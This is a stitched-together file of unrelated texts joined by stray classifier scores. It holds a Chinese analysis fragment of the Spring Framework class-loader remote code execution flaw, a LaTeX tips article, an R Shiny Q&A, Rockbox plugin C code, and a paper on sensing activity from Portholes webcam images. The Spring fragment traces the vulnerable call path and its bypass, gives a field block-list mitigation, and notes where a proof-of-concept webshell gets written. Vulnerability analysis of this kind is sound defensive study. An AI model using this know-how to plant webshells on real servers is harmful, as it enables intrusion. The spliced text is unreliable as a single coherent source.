AbstractNestablePropertyAccessor.java setPropertyValue(PropertyValue):256, AbstractNestablePropertyAccessor (org.springframework.beans), AbstractNestablePropertyAccessor.java setPropertyValues(PropertyValues, boolean, boolean):104, AbstractPropertyAccessor (org.springframework.beans), AbstractPropertyAccessor.java applyPropertyValues(MutablePropertyValues):856, DataBinder (org.springframework.validation), DataBinder.java doBind(MutablePropertyValues):751, DataBinder (org.springframework.validation), DataBinder.java doBind(MutablePropertyValues):198, WebDataBinder (org.springframework.web.bind), WebDataBinder.java tomcat.util.threads), TaskThread.java 如果看源码分析发现,在AbstractNestablePropertyAccessor中也存在getPropertyValue调用了getPropertyAccessorForPropertyPath方法。这也是call-graph的一种缺点吧,相比真正的data-flow-graph还是有不足之处,但相比而言静态的call-graph已经非常具有参考价值了,是一种辅助分析手段。 image-20220411135816134 org.springframework.beans.PropertyAccessorUtils#getNestedPropertySeparatorIndex中,这段代码作用获取.的位置,然后返回位置。在以.为分割线,取字符串,首先会取class字符串,在依次module、classloader…..nestedPath是记录分割之后的字符串,nestedProperty是记录分割出来的字符串,传入getNestedPropertyAccessor方法之中。 image-20220411145624213 首次进入getNestedPropertyAccessor方法会创建一个hashmap,然后调用getPropertyValue方法。 image-20220411150438574 在getPropertyValue方法中调用getLocalPropertyHandler,由于getLocalPropertyHandler是抽象方法,会调用实现方法这里是BeanWrapperImpl.class类中的getLocalPropertyHandler方法。但BeanWrapperImpl是AbstractNestablePropertyAccessor的实现类,JavaBean存在内省(Introspection)机制,调用方法getLocalPropertyHandler之前会首先调用setIntrospectionClass方法。在方法getLocalPropertyHandler中,首先会调用getCachedIntrospectionResults方法,由于此时的BeanWrapperImpl中的CachedIntrospectionResults为null,因此会org.springframework.beans.CachedIntrospectionResults#forClass方法创建CachedIntrospectionResults对象。 image-20220411152656673 在CachedIntrospectionResults类中的构造器方法,存在前面历史漏洞的修复方案。但自从Java9加入module机制之后,此修复方案就可以被绕过了。 image-20220411153019571 首先会加入propertyDescriptors是class所指向的getClass()方法,然后循环之后module所指向的getModule()方法,依此类推。 image-20220411153253137 在全部加入之后,会去=后边的值,实现方法org.springframework.beans.AbstractNestablePropertyAccessor#processLocalProperty方法,最终会调用BeanWrapperImpl#setValue进行赋值操作。 image-20220411154854172 修复方案 与之前修复方式不一样,之前是获取pd的名字,现在直接判断pd类型,直接将classloader和Protection类加入黑名单了。 image-20220411164642240 临时性修复方案,首先来看代码,将{"class.*","Class.*","*.class.*","*.Class.*"}字符串数组加入黑名单,这样子使用大小写无法绕过。但为什么要调用WebDataBinder#setDisallowedFields方法呢? @ControllerAdvice @Order(Ordered.LOWEST_PRECEDENCE) public class GlobalControllerAdvice { @InitBinder public void setAllowedFields(WebDataBinder dataBinder){ String[] abd= new String[]{"class.*","Class.*","*.class.*","*.Class.*"}; dataBinder.setDisallowedFields(abd); } } 我们在回到最初漏洞开始的地方,会看堆栈内容,往前看几眼,会分析存在WebDataBinder对象。发送请求之后,会经过一系列filter,handler操作之后,首先会将请求处理到ServletRequestDataBinder对象中。然后再是WebDataBinder对象,而在WebDataBinder对象中提高设置那些字段不允许的方法。设置之后,恶意请求就会在WebDataBinder过滤掉了,不会进行进一步的处理。 image-20220411220356150 内省机制 下面是一个最简单Spring框架下的内省机制的使用,其中第五行代码 bwl.setPropertyValue("student.name", "张三");。其中student.name,我们能更进一步的理解payload如何构造了,也能理解为什么需要getNestedPropertySeparatorIndex方法将字符串分割。 public static void main(String[] args) throws InvocationTargetException, IllegalAccessException { BeanWrapperImpl bwl = new BeanWrapperImpl(new School()); bwl.setAutoGrowNestedPaths(true); //自动属性嵌套 bwl.setPropertyValue("name", "北京大学"); bwl.setPropertyValue("student.name", "张三"); PropertyDescriptor[] pds = bwl.getPropertyDescriptors(); Set<String> propertyNames = new HashSet<String>(); for (PropertyDescriptor pd : pds) { //获取属性名称 System.out.println(pd.getName() + " : " + "" + pd.getPropertyType() + " : " + pd.getReadMethod().invoke(bwl.getWrappedInstance())); propertyNames.add(pd.getName()); } System.out.println(Arrays.toString(propertyNames.toArray(new String[propertyNames.size()]))); } image-20220411212017666 环境搭建小问题 使用idea热部署debug的时候,配置如下图。 image-20220409142320956 Deployment选择exploded,在项目配置可以看到输出路径,也就是web路径。在该路径下添加jsp,也会动态解析。然后用poc打网站,就路径要写绝对路径。 image-20220409142407102 image-20220409142457062 如果不写绝对路径,webshell会输出到下面的临时路径。因为idea会自动配置一个临时tomcat的配置环境,所以webshell会输出到临时路径。 C:\Users{Name}\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat 参考 Tomcat Access Log配置 SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析 Spring Beans RCE分析 spring-framework的修复方案 github 补丁代码
__label__pos
0.61955
Featured Book LaTeX Beginners Guide Partner Sites TeXwelt - Fragen und Antworten zu LaTeX TeXblog TeXample LaTeX Tricks (VII) PDF Print E-mail (7 votes, average: 4.43 out of 5) LaTeX - General Written by Luca Merciadri    Wednesday, 20 March 2013 00:00 We shall see some tricks: 1. Putting two itemizations on the same line, 2. Using footnotes in boxes, 3. Dealing with PDF cut-and-paste and search functionalities, even when you are using accented characters, 4. Making a distinction with \overline for propositional logic formulae, 5. Referring to labels by long names. We will then discuss some problems people often face when dealing with many figures, and, more generally, floats, in reports. Finally, we will deal with a Beamer scheme which aims at using a single file for both a presentation, and the related report. By Luca Merciadri, http://www.student.montefiore.ulg.ac.be/~merciadri/ Download as PDF file Contents Putting two itemizations on the same line Example Say you want To items on the same line Code This is achieved thanks to \begin{enumerate} \item First item \item Second item \item[\refstepcounter{enumi}\labelenumi\% -- \refstepcounter{enumi}\labelenumi] % Third and fourth items \item Fifth item \end{enumerate} Thanks to Philipp Stephani (see [7]). Using footnotes in boxes Example Say you want this (note the footnote). Footnote in a box You will notice that a footnote was placed in the bottom of the page, as desired. Generally, generating footnotes from a box is not that easy because of internal \footnote limitations. [6] You might use a different syntax than \put and \framebox for boxes, but if you want to stick with this syntax, a first solution is to use \footnotemark that generates the footnote marking in the text, together with \footnotetext{...} that generates the footnote text. The former needs to be put in the box (so that the number actually appears in the box), when the latter needs to be given outside the box, but on the same page. [6] Code This is the approach that I used: \footnotetext{This is a fruit} \addtocounter{footnote}{-1} {\setlength{\unitlength}{6mm} \begin{picture}(13,7)(0,0) \put(0,3){\framebox(4,2){This is Box 1}} \put(7,0){\framebox(5,2){ \shortstack{100 Apples\footnotemark are\\% in Box 2}}} \put(4,4){\vector(1,1){2.8}} \put(7,3){\framebox(5,2){ \shortstack{This is box three}}} \put(4,4){\vector(1,0){2.8}} \put(7,6){\framebox(5,2){ \shortstack{ This is box 4}}} \put(4,4){\vector(1,-1){2.8}} \end{picture} } The advantage of this approach is that it is relatively ‘clean’, i.e. you are not obliged to use \textsuperscript, be it in the box, or in the footnote, for numbering. Thanks to Heiko Oberdiek at [6] for this. Note that many other solutions are available to write diagrams, such as DOT. PDF compatibility In our last article, we treated extensively about ‘input encoding’. Here, we will detail two PDF problems: search and copy-and-paste, with their respective solutions. One might generate a PDF document using LaTeX2e, but if this document contains accented characters, searching for words containing accented characters could always fail, depending on the PDF reader. The first problem is that the default font encoding is OT1. It should generally deal correctly with basic ASCII characters and the PDF operations on it. But once you will use accented characters, it might cause troubles with some PDF readers. A solution is to use the T1 font encoding, conjointly with the cmap package. As a result, the \usepackage[T1]{fontenc} \usepackage{cmap} set of directives should fix search and copy-and-paste in traditional PDF readers, even for Greek symbols in formulae. [5] Propositional Logic Let us express the dual of A as A. The major problem using \overline is that if you write things like AB (\overline{A}\overline{B}), they look exactly the same as AB (\overline{AB}). Or the latter is equal to A + B by de Morgan’s rules, and thus differs from the former on a truth table. So, a distinction needs to be made. Enrico Gregorio gave me the solution at [1]. Implement \newcommand{\closure}[2][3]{{}% \mkern#1mu\overline{\mkern-#1mu#2}} and then write \closure{A}\closure{B} and compare it to \closure{AB} The respective results are Closures compared One can now see the difference. This command accepts one optional argument and one mandatory argument. This command works this way (thanks to Claudio Beccari for a detailed explanation): 1. it advances by #1mu (#1 is the optional number); mu is the special math length unit that is equivalent to 1/18th of 1em of the current font, so that it obeys the different sizes used in math for the main formula, and for the first- and second-order sub- and super-scripts, 2. it overlines an argument made up of the following items, 3. a negative math kern of #1mu, in order to get back by the same amount it advanced in step 1, 4. the second argument represented by #2. The ‘step forward – step back’ procedure is used because the overline is a little shorter than it would be if the step back step was absent; therefore \closure{A}\closure{B} do not have touching overlines and produce a different result than \closure{AB}. Of course, the optional amount of kerning may depend from the real obligatory argument. For example, arguments that fill their bounding box such as H, M, N, Z, T, I, would maybe require 3mu, while, for arguments that do not fill their bounding box, such as A, O, S, C, and the like, 2mu or 1.5mu might be better values. The optional argument to \closure, such as in \closure[2]{A}, is thus meant to correct possible ‘errors’ due to letter form. Referring to labels by long names Code Say you want to \label{} e.g. an enumerate’s environment’s item. You then have, for example, \begin{enumerate} \item First item, \item Second item. \end{enumerate} Now, one wants to say ‘see Item 1’. This can be achieved using \begin{enumerate} \item First item, \label{item:firstitem} \item Second item. \end{enumerate} and then, ‘see Item \ref{item:firstitem}’ somewhere in the text. This is the traditional approach to the \ref and \label commands. But now, how does one manage if he wants to write ‘see Item \ref{item:firstitem}’ and wants ‘see Item [name]’ to appear, where [name] is an attribute of \label, for example defined like \begin{enumerate} \item First item, \mylabel{item:firstitem}{% Fruits and Co.} \item Second item. \end{enumerate} where here, name is‘Fruits and Co.’? He could then have, in the output, ‘see Item Fruits and Co.’ For this, I did not try using zref, but used Mr. Oberdiek’s trick ([4]): \makeatletter \newcommand*{\mylabel}[2]{% \@bsphack \begingroup \def\@currentlabel{#2}% \label{#1}% \endgroup \@esphack } \makeatother Example This gives 1. First item, 2. Second item and a reference to the first item is ‘Fruits and Co.’ Note also that the nameref package exists, which solves the closely-related problem of e.g. including the name of a section when cross-referencing. Float management Many LaTeX-beginners are often frustrated. This happens especially when, after compilation, their figures, tables, and, more generally, floats, appear at incongruous places. For example, one might already have a ‘sufficient’ number of floats on one page, the following floats being moved to the following page(s). On a content-oriented approach, it is, effectively, sometimes disturbing, be it to the reader, or to the writer, to look at such behaviors without any clue on how to deal with this placement. Before trying anything, an important thing is to understand, briefly, why and how LaTeX manages to put floats this way. It is typographically disadviced to put too much images or tables on one page, or, more generally, in the ‘main matter’ of a document. If you need to put so much images in your document, ask yourself some questions: • Is it a good way to present things? • Shouldn’t I select the most important images and tables? • Couldn’t I put some images and tables on specific pages only, or in the appendices? • ... Once you have clear and responsable answers to these questions, you might still need to fine tune the placement of your floats. If you need to put floats on specific float pages, in the ‘main matter’ of your document, you might use the [p] option after the beginning of your environment: figure, table, etc. However, typography rules sometimes go against your rules, i.e. the way you (want to) present things. If you know what you are doing, you might simply, sometimes, feel the need to include a float at a place where LaTeX does not want it to be at all. If you tried even with the [h!] option, meaning ‘put this float here!’, to no avail, you might consider modifying some internal parameters, because putting an exclamation mark in the list of placement options makes LaTeX ignore all the constraints but \topfraction, \bottomfraction, and the ones with floatpage in their names. [8] Once again, ask you questions: • Are there too much floats on my page? • Is my float too big? • Where am I including my float? If your float is too big, either you resize it until it comes on the desired page, or you let it where LaTeX puts it. But if there are too many floats, you need to know that LaTeX defines a limit on the number of floats by page. Acceptable parameter modifications might be found at [8]: % See p.105 of "TeX Unbound" for suggested values. % See pp. 199-200 of Lamport’s "LaTeX" book for details. % General parameters, for ALL pages: \renewcommand{\topfraction}{0.9} % max frac of fl. at top \renewcommand{\bottomfraction}{0.8} % max frac of fl. at bot. % Parameters for TEXT pages: \setcounter{topnumber}{2} \setcounter{bottomnumber}{2} \setcounter{totalnumber}{4} \setcounter{dbltopnumber}{2} % for 2-column pages \renewcommand{\dbltopfraction}{0.9} % fit big float above 2-col. text \renewcommand{\textfraction}{0.07} % allow minimal text w. figs % Parameters for FLOAT pages: \renewcommand{\floatpagefraction}{0.7} % require fuller float pages % N.B.: floatpagefraction MUST be less than topfraction! \renewcommand{\dblfloatpagefraction}{0.7} % require fuller float pages % remember to use [htp] or [htpb] for placement If you find that liberal values of the float parameters still are causing trouble, you can try forcing a float page with \clearpage to disgorge the accumulated blockage. If you do not want to force a pagebreak, use the afterpage package and tell LaTeX \afterpage{clearpage}, which should force a float page when the current page comes to an end. If floats continue to pile up at the end, you probably have one too big to fit on a page; try reducing its size. [8] In extreme cases, you might consider using the float package. [8] LaTeX mechanisms are sufficiently well programmed so that, under normal use, they do not cause you too much trouble with floats, i.e. floats are not rejected too far in the document. In my reports, where I often need to include graphics, I generally encounter no problem, without any specific tuning. Most problematic cases are linked to the question Do I need to let LaTeX put my floats e.g. two pages after where they are included, between some paragraphs which have absolutely no link with these figures, or should I manage to put my figures differently? The answer to this question is that you should normally consider using pages for floats, or at least manage to put figures in pages whose context is linked to the appearing figures. If a float is rejected on the following page, it is generally not too much shocking for the reader, and it might even be a good thing if you prefer this way to present things. But if your floats are rejected further, it generally becomes disturbing for the reader, who needs to look for figures through your document. Beamer and articles When you use the beamer class, you can evidently produce slides (we will call this the presentation), e.g. for a conference, but you can also produce a handout. Generally, a handout is considered to be a scaled version of the slides, so that more than one slide fits on the page. This can generally be achieved using PDF tools, and this is not our concern here. The case we want to treat here is the one where you write a presentation, and want to write a report too, both being related to the same content. It might be interesting if the presentation you are writing mainly consists of a summary of your research. If you want to reuse your beamer presentation to write the article, or the contrary, you can do this in a very simple way, thanks to Mr. Knudsen explanations at [3], and to [2]. Consider that you have three files: • content.tex • presentation.tex • report.tex Then, the idea is to put the whole content (i.e. text that will either be shown in the presentation, or in the report, the ‘or’ being inclusive) in content.tex. That means that all your content will be put in this file. This file does not need to have any preamble, because it will be included by both report.tex and presentation.tex. Now, we need to specify how your content will be directed to the presentation, the report, or both. There is a quick way for this: \mode<presentation> for presentation mode, and \mode<article> for article mode. That means that you will have a file content.tex like \section{First Section} \mode<article> { % Appears in the article } \frame { \frametitle{My Frame} % Appears in both versions } % Appears in both versions % (except if specified differently) You can then also use the \mode command in the frame content e.g. to scale differently images. Say you are in a frame. You can then use \begin{figure}[h] \centering \mode<presentation> { \includegraphics[scale=0.2]{img.eps} % small } \mode<article> { \includegraphics[scale=1.5]{img.eps} % bigger } \caption{Appears in both versions.} \end{figure} The report.tex file will be written using e.g. \documentclass{article} \usepackage{beamerarticle} \begin{document} \input{content.tex} \end{document} The presentation.tex file will follow habitual rules: \documentclass{beamer} \begin{document} \input{content.tex} \end{document} By using this scheme, your content will only reside in content.tex and it could be an advantage, for two main reasons: • You have only one file for the content, for both versions, • If you use many code snippets, in your report, from your presentation, content modification (e.g. modifying numbers, a caption, a title, . . . ) is centralized, and, as a result, you only modify things once. This allows extra consistency between your report and your slides. References [1] Enrico Gregorio. Appunti di programmazione in LaTeX e TeX, 2009. Second edition. http://profs.sci.univr.it/~gregorio/introtex.pdf. [2] HAPPYMUTANT.COM. A Quick & Dirty Guide to LaTeX – Making LaTeX Beamer Presentations, 2010. http://happymutant.com/beamer/. [3] Torben Knudsen and Luca Merciadri. Including only frames in the beamer (comp.text.tex discussion), 2010. [4] Lars Madsen, Heiko Oberdiek, and Luca Merciadri. Using the ref and label commands so that ref points to the label but with a user-given name (comp.text.tex discussion), 2010. [5] Günter Milde and Luca Merciadri. Font encodings and PDFs, 2010. [6] Heiko Oberdiek and Luca Merciadri. Footnotes in boxes (comp.text.tex discussion), 2010. [7] Philipp Stephani and Luca Merciadri. Enumerate package: how to put two itemizations on the same line? (comp.text.tex discussion), 2010. [8] Andrew T. Young. Controlling LaTeX floats, 2010. http://mintaka.sdsu.edu/GF/bibliog/latex/floats.html. Comments Please login to post comments or replies.   Latest Forum Posts  Re: Difficulty with title page and logo 28/01/2015 23:53, Johannes_B Re: Difficulty with title page and logo 28/01/2015 23:25, Cham Re: Difficulty with title page and logo 28/01/2015 23:02, Cham Re: Difficulty with title page and logo 28/01/2015 22:59, Johannes_B Difficulty with title page and logo 28/01/2015 22:52, Cham Re: Modify Bibliography Style in Thesis Template 28/01/2015 16:41, Catiny Re: LaTeX Editor as part of Microsoft Office 27/01/2015 18:02, Stefan_K LaTeX Editor as part of Microsoft Office 27/01/2015 15:42, EthanDavis Re: list with no indentation on first line of item 26/01/2015 18:24, Stefan_K Re: Hide Navigation Symbols 26/01/2015 18:23, Stefan_K
__label__pos
0.921176
Bruna Wundervald Bruna Wundervald - 7 months ago 29 R Question plotting equations with restricted domains in shiny there. Im building an shiny app thats plots some functions. The user can modify the parameters. The problem appears when I have a restricted function, specially when its related to x. This is one example: Sliders: sliderInput("th19", HTML("$$ \\theta_1 $$"), min = 1, max = 10, value = 2) sliderInput("thB9", HTML("$$ \\theta_b $$"), min = 1, max = 10, value = 2) sliderInput("vthB9", HTML("$$ \\vartheta_b $$"), min = 1, max = 20, value = 2) Plot: mForm9.1 <- as.formula("Y ~ vthB9 + th19*(x - thB9)") mExpr9.1 <- mForm9.1[[3]] output$Curve9 <- renderPlot({ th19 <- input$th19 vthB9 <- input$vthB9 thB9 <- input$thB9 eval(call("curve", mExpr9.1, col = 2, ylab = "", main = expression(vartheta[b] + theta[1]*(x - theta[b])))) }, height = 400, width = 600) mainPanel( tabsetPanel(type = "tabs", tabPanel("Gráfico", plotOutput("Curve9")) )) What happens here is that when 'x' is bigger than 'vthB9', the equation resumes itself to only 'vthB9', and this is only one of the cases I have. Anybody knows what to do? *Hope I have been clear *Im using flexdashboard , this is why the shiny might seen a little different Answer There are possibly multiple ways to plot a piecewise function in R. I am going to suggest probably the easiest way of doing it in this case: We first define the piecewise function, say, fun fun <- function(x) { ifelse(test = x <= vthB9, yes = vthB9 + th19 * (x - thB9), no = vthB9) } which we then pass to curve curve(expr = fun, from = 0, to = 10, col = 2, ylab = "", main = expression(vartheta[b] + theta[1] * (x - theta[b]))) curve is going to input a vector as a parameter to the function fun. The usual if-else statements are not going to work because they can test only one value at a time - unless we write a for-loop or vectorise it somehow with a function Vectorize. Instead of that, we pick ifelse which is already vectorized. Since you have used a shiny tag I've prepared a shiny app instead of flexdashboard :) Full shiny example ui <- fluidPage( sidebarLayout( sidebarPanel( sliderInput("th19", HTML("&theta; <sub>1</sub>"), min = 1, max = 10, value = 2), sliderInput("thB9", HTML("&theta; <sub>b</sub>"), min = 1, max = 10, value = 2), sliderInput("vthB9", HTML("&thetasym; <sub>b</sub>"), min = 1, max = 20, value = 2) ), mainPanel( tabsetPanel(type = "tabs", tabPanel("Gráfico", plotOutput("Curve9"))) )) ) server <- function(input, output) { output$Curve9 <- renderPlot({ th19 <- input$th19 vthB9 <- input$vthB9 thB9 <- input$thB9 # Define a piece wise function fun <- function(x) { ifelse(test = x <= vthB9, yes = vthB9 + th19 * (x - thB9), no = vthB9) } # x-axis goes now from 0 to 10 curve(expr = fun, from = 0, to = 10, col = 2, ylab = "", main = expression(vartheta[b] + theta[1] * (x - theta[b]))) }, height = 400, width = 600) } shinyApp(ui, server)
__label__pos
0.996494
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 /*************************************************************************** * __________ __ ___. * Open \______ \ ____ ____ | | _\_ |__ _______ ___ * Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ / * Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < < * Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \ * \/ \/ \/ \/ \/ * $Id$ * * Copyright (C) 2009 by Maurus Cuelenaere * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY * KIND, either express or implied. * ****************************************************************************/ #include "plugin.h" /* #include "lib/pluginlib_exit.h" */ #if (CONFIG_PLATFORM & PLATFORM_NATIVE) #include "../codecs/lib/setjmp.h" #else #include <setjmp.h> #endif PLUGIN_HEADER extern enum plugin_status plugin_start(const void*); static void (*atexit_func)(void); static jmp_buf __exit_env; int atexit(void (*fn)(void)) { if (atexit_func) return -1; atexit_func = fn; return 0; } void exit(int status) { longjmp(__exit_env, status != 0 ? 2 : 1); } enum plugin_status plugin__start(const void *param) { enum plugin_status ret; ret = setjmp(__exit_env); if (ret == 0) ret = plugin_start(param); else { if (ret == 1) ret = PLUGIN_OK; else if (ret == 2) ret = PLUGIN_ERROR; } if (atexit_func) atexit_func(); return ret; }  
__label__pos
0.878844
ACTIVITY SENSING THROUGH PORTHOLES IMAGES: A BRIDGE BETWEEN PASSIVE AWARENESS AND ACTIVE AWARENESS Luca Giachino - August 1993 email: [email protected], [email protected] CEFRIEL - Via Emanueli, 15 - 20126 Milano - Italy Work performed while visiting the Telepresence Project at the University of Toronto Introduction Portholes is a system that provides support for general awareness in a distributed work group. It gathers still images from different environments (workspaces and public areas) and distributes them to subscribers of the service, without performing any semantic interpretation. It is up to the subscribers to look at the images and to give them a meaningful semantic. Given this architecture, it is interesting to investigate the automatic extraction of information from the environment through the images collected by Portholes. This information can be used for issuing notifications of events concerning persons' presence and availability. In this way the Portholes architecture becomes a mean for performing activity sensing on the environment, thereby providing a bridge between passive awareness and active awareness. In order to provide active awareness, in general the kind of activity we are interested to monitor is human activity, so that we can issue notifications concerning relevant people's actions, like leaving their workspace, logging out from the iiif server, changing the state of their offices' door. Among these possible actions, the person's presence in front of his or her camera can be detected by properly comparing sequential images grabbed from that camera. Other actions can be more easily detected inquiring the iiif server. In our media space one of the reasons for using the Portholes images for sensing human activity, instead of other environment sensors, is that the cameras, the wiring and the iiif server are already there. Another reason for using images provided by cameras is that we can expect in the next years an increasing production of personal computers equipped with cameras, together with speakers and microphones. In order to detect the presence of human activity using the Portholes images, I wrote a software module, called CmpFrames, that given two consequential frames of the same scene guesses if there is or there is not human activity. CmpFrames has been designed to be very quick in providing a guess, but it provides only a 'guess'. For the sake of execution speed, it assumes that the scene has some specific properties, like a stable background, for instance. If these properties are not met, then the guess can be wrong, and the sensed activity can be of other nature (a screen saver, for instance). CmpFrames is the fundamental brick upon which I created a personal notification tool, called Monitor, that provides notifications of people's presence and availability. It has been mainly written for testing the CmpFrames module, but it turned out to be an interesting personal notification tool. At the time of this writing, the CmpFrames module has not yet been integrated in Portholes. The images are gathered by asking the iiif server to connect people's cameras to a frame-grabber. Users privacy is guaranteed by the access control performed by the iiif server. The following two sections describe the concept of active awareness and the CmpFrames algorithm. If you are mainly interested in testing and using the Monitor program you can skip these two sections and read the next one, The Monitor Program session, that explains the purposes of the program and how to use it. A Bridge from Passive Awareness to Active Awareness Before describing in details the CmpFrames software module and the Monitor program, it is useful to briefly describe what I intend for a bridge between passive awareness and active awareness. The terminology distinction between passive and active awareness is somehow new, and needs to be more investigated than I did so far. Provided that the terminology in the computer supported awareness field is not yet there, we are in the position of enhancing and conceiving terminology, with all the possible debates that can follow. In terms of communication involving human beings and computers, Portholes can be considered as a system that allows HH communication in the background. the following figure shows a conceptual frame (borrowed from Professor Bill Buxton) for describing the possible kinds of communications we find in systems that involve both human beings and computers (eventually connected by networks). In this frame the Portholes system falls in the HH background communication category, since it allows human to human communication performed without explicit users' actions. Figure 1: The Communication Arena In addition to investigate the single areas, it is also interesting to explore the possible migrations from one area to another. The CmpFrames software module provides the path for one possible migration, which is shown in the next figure. There we see that by means of the CmpFrames module, Portholes detects on behalf of a client that a user is now available (HC communication in the background), alerts the client through the GUI asking if he or she wants to call a video meeting (HC communication in the foreground), and finally a video meeting is called (HH communication in the foreground). Figure 2: A Possible Path from Background to Foreground HH Communication According to this scheme, whilst the Portholes system provides passive awareness, that is awareness gained in the background, the CmpFrames software module and the Monitor program constitute the means for achieving active awareness, that is awareness gained in the foreground. But the question is: once we enhance Portholes for providing active awareness, how will we consider it? A more general awareness support tool or a mixing of somehow unrelated facilities? Moreover, we could experiment people reluctance in having their images periodically distributed among other users (Portholes), but not as much as for active awareness purposes that do not imply the distribution and public accessibility of images (CmpFrames and Monitor). The CmpFrames Software Module In order to describe the CmpFrames software module and the design issues that drove its realization we have to describe the scene we consider, which parts of the scene are of interest for the detection of human activity, and how we can gather images of the scene. Moreover, we have to outline the constraints we have to take into account, mainly imposed by the hardware, by the grabbing rate, and finally by the requirement to have a quick guess at the price of some uncertainty. The Scene The scene we consider for detecting human activity is rather complex. We want to monitor people's workspace, and so we restrict the spectrum of the possible scenarios to those you can find in a typical office environment. At the Telepresence Project laboratories we have both closed offices (Toronto) and open offices (Ottawa). Offices can have real or artificial windows with moving scenarios behind (a street, a cloudy and windy sky, a soccer court). If they have real windows, the light inside the office can strongly depend on the weather conditions. In the offices there can be computer monitors with screen savers that can modify the displays even when nobody is there. Moreover, in open offices it is likely that people besides the person we want to monitor move in the environment. The View of the Scene Besides the peculiarities of the scene we consider, also the position and orientation of the camera we use and the quality of the hardware involved play a crucial role. In an office, the camera from which the images are frame-grabbed can be in different positions. In our media space, for example, some people have one only camera located in front of them very close to their work desk and oriented towards the person. Some others have additional cameras for shooting the whole office space, or for shooting from particular perspectives (like a camera located on the office's door). All of these cameras provides different views of the environment, and this augments the complexity of the scene. For our purposes, the farther the camera is, the better is since we can monitor a larger space. But the drawback is that the chance of having moving objects in the scene, in addition to the person, increases. The cameras we use provide colored video sequences, but for our purposes we consider only gray-levels images (256 gray levels). This choice is partially due to the fact that Portholes handles gray-level images in order to reduce the network overhead. These images are pretty small (240x160), but convey enough information for the human activity detection. The rate at which the images are provided can range between one every 30 seconds to one every 5 minutes. Portholes generally provides images at the rate of one every 5 minutes. The rate has important implications on the design of the algorithm for the activity detection, as it is described later. The Relevant Information Our purpose is to detect human activity in a very quick way. We don't need to recognize the person (a very time consuming process) since we can assume that in an office the most part of the activity is performed by the person who actually works in that office (compared to colleagues and cleaning staff). We do not even need to extract geometrical descriptions of the image. Any recognition process is generally a complex task, and this is way we decided to avoid any morphological interpretation of the images' contents. Moreover, a human shape recognition system, for example, might require even more constraints on the scene, like to have the person perfectly oriented towards the camera. The CmpFrames Algorithm According to the described scene and constraints, I opted for an algorithm that given two consequential images counts the percentage of pixels that can be considered different (according to an error threshold), and then compares this percentage with a quiet threshold. If it is lower than the quite threshold, then the algorithm assumes that there is not activity, otherwise that there is activity. As long as the images are very similar one to the next we assume that there is not relevant activity. The activity condition is the complementary one, no matter how different the images can be. In other words, we actually detect quietness as apposite to human activity. This approach is pretty interesting, since it allows us to detect activity also when the person rotates the camera, since the images from one state of the camera to the next one will be even more different, and this is enough to assume that there is activity. Even if the camera is now oriented towards the wall, at least for one more image we can still detect activity, and this guess is correct since the person had to be there for rotating the camera. The drawback is that we need to have two frames in order to make a decision, and this fact leads to a delay in recognizing when the person leaves his or her workspace (this point will be better explained describing the Monitor program). The fact that we need two consequential images means also that their histograms must not be altered (for instance, through a normalization process), otherwise the process would easily detect changes that are actually produced by the image processing calculations on the histograms. In order to have this approach effective, we assume that when a person is not in the view of the camera, the sequential images are very similar one to the next, that is, the background does not change. This is obviously a strong limitation, since in the view of the camera, as already mentioned, it is likely to have moving objects other than the person we want to monitor. Moreover, even in the presence of a very stable background, the hardware limitations are likely to produce consequential images that are not equal pixel per pixel. The Hardware Limitations The hardware between the scene and the grabbed image is composed by a camera, a wire with possible intermediate analog devices, and a frame-grabber. All these components produce noise on the analog video signal. In our media space, for instance, many cameras are located pretty far from the frame-grabber. In within there are meters of wire and sometimes devices for conveying different video signals on the same wire. The hardware limitations produce two different effects on the images. The first one is the presence of spikes, that is isolated pixels that have a very different gray-level from their neighborhood. The second one is that even with the same scene pixels in the same positions can have different levels of grays in two consequential images. The algorithm we propose filters the images using a convolution mask that actually smoothes the discrepancies. This process reduces the incidence of the spikes, and cleans the image producing more uniformity between images of the same scene. After this smoothing process is completed, the algorithm begins to compare the images. During the comparison of pixels the algorithm uses a proximity level, or error threshold, for deciding if two pixels are to be considered equal or not. This error threshold helps to reduce the incidence of the hardware limitations. The error threshold is a parameter of the algorithm that can be tuned in order to accommodate the hardware limitations. If the hardware is of good quality, then the error threshold can be lowered. The algorithm requires an error threshold expressed in percentage. It then calculates the absolute error threshold by: 1) extracting the maximum gray level from each of the two images, 2) choosing for the lower one, 3) applying the percentage to this level of gray. In this way we use the worst conditions for calculating the absolute error threshold, and we recalculate it for every pare of images. The Scene Constraints The quiet threshold is used to decide if the percentage of changed pixels is high enough to detect the presence of activity. By choosing a proper level, we can discriminate between small and consistent changes in the scene. In this regard, the grabbing rate becomes very important. If the camera video signal is sampled every 5 minutes, then it is pretty likely that if a person is in front of the camera in two sequential images he or she will have moved consistently (aside sleeping conditions), even if deeply concentrated on something. In this case, the quiet threshold can be increased enough to let the algorithm consider small changes as absence of activity (a screen saver or a truck moving on the street). On the other hand, if the rate is of one frame every 30 seconds, then it can happen that in such a small amount of time the person does not move a lot, perhaps because is typing on the keyboard. In this case the threshold must be lowered so that even very small movements of the person can be enough to detect the presence of activity. But the drawback is that also small changes in the background could trigger such a condition, even if the person is not there. The distance of the action from the camera is also important. Since we use a percentage of changed pixels for detecting action, as the action is smaller in the images (because the people is far), the percentage of changed pixels is lower. In this case the quiet threshold should be lowered accordingly. Finally, the brightness of the scene effects the amount of noise introduced by the camera. As the scene becomes darker and darker, the noise introduced by the camera increases, and a higher error threshold might be required. As appears from this description, the thresholds are very important in order to have the algorithm working properly under different conditions. Even if the best solution would be to have adaptive thresholds, good performances can already be obtained by using personal profiles in which the best empirical thresholds for every person we want to monitor are stored. We will better describe this idea in the Future Work session. How to Fine Tune the Thresholds Our experience with the hardware we have and the kind of scenes we have showed that an error threshold of 3% is enough for masking the hardware limitations, and that consequently a good quiet threshold is 8%. Note that the effectiveness of the quiet threshold depends on the error threshold. 